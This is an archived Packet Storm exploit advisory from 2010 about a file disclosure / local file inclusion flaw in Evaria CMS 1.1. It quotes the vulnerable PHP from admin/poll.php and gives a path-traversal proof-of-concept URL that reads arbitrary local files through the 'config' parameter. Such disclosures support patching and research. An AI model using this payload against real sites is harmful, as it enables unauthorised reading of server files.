exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Evaria Content Management System 1.1 File Disclosure

Evaria Content Management System 1.1 File Disclosure
Posted Oct 1, 2010
Authored by khayeye shotor

Evaria CMS version 1.1 suffers from a file disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | 11d7bd467c1c6989bce371d3712b62e770f4b8bc1844628f2d22723fdc57e7a5
Download | Favorite | View

Evaria Content Management System 1.1 File Disclosure

Change Mirror Download
# Exploit Title: local file include / File Disclosure
# Date:
# Author: khayeye shotor
# Software Link: http://www.evaria.com/en/?view=download&dload=1
# Version: Evaria Content Management System v.1.1
# Thanks:  khayeye sag , kandome mivei , sinehaye amam and all amehaye irani
-----------
 
 
vul code: /path/admin/poll.php
 
           $file_contents = file("admin/".$current_poll);
             if (((isset($vote_logging))) && (($vote_logging == 1) || ($vote_logging == 3))) {
                foreach ($file_contents as $line) {
                        if (eregi($REMOTE_ADDR, $line)) {
                           display_form();
                           echo "<TABLE align=\"center\" width=\"100%\" cellspacing=\"2\" cellpadding=\"2\" border=\"0\">\n  <TR>\n";
                           echo "    <TD class=\"poll_status\" align=\"center\">" . $already_voted . "</TD>\n";
                           echo "  </TR>\n</TABLE>\n";
                           $set_already_voted = 1;
                           $vote_allow = 0;
                           break;
                        }
                }
             }
             if (((isset($vote_logging))) && (($vote_logging == 2) || ($vote_logging == 3))) {
                if ((isset($voted)) && ($voted == "on")) {
                   if (!$set_already_voted) {
                      display_form();
                      echo "<TABLE align=\"center\" width=\"100%\" cellspacing=\"2\" cellpadding=\"2\" border=\"0\">\n  <TR>\n";
                      echo "    <TD class=\"poll_status\" align=\"center\">" . $already_voted . "</TD>\n";
                      echo "  </TR>\n</TABLE>\n";
                   }
                   $vote_allow = 0;
                   break;
                }
             }
             if ($vote_allow) {
                $poll_string = $vote . "|" . $REMOTE_ADDR . "\n";
                $fp = fopen("admin/".$current_poll, "a");
                $string_size = strlen($poll_string);
                if (fputs($fp, $poll_string, $string_size)) {
                   display_form();
                   echo "<TABLE align=\"center\" width=\"100%\" cellspacing=\"2\" cellpadding=\"2\" border=\"0\">\n  <TR>\n";
                   echo "    <TD class=\"poll_status\" align=\"center\">" . $vote_cast . "</TD>\n";
                   echo "  </TR>\n</TABLE>\n";
                }
                fclose($fp);
             }
          }
          break;
           
       case "default":
       display_form();
       break;
 
   }
}
 
// Display poll form if no view is called upon...
if (!isset($mode)) {
   display_form();
}
elseif ((isset($vote) == 0) && (isset($mode))) {
   display_form();
   echo "<TABLE align=\"center\" width=\"100%\" cellspacing=\"2\" cellpadding=\"2\" border=\"0\">\n  <TR>\n";
   echo "    <TD class=\"poll_status\" align=\"center\">" . $no_selection . "</TD>\n";
   echo "  </TR>\n</TABLE>\n";
}
 
function display_form() {
         global $config;
         global $no_voting;
         global $QUERY_STRING;
         echo "<FORM name=\"poll\" action=\"?" . $QUERY_STRING . "\" method=\"post\">\n";
         echo "<TABLE align=\"center\" width=\"100%\" cellspacing=\"2\" cellpadding=\"2\" border=\"0\">\n";
         echo "  <TR>\n";
         $answers = file("admin/".$config);
------------------------------------------------
 
poc:
/admin/poll.php?config=../../eprint.php
 
/admin/poll.php?config=[local file]


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close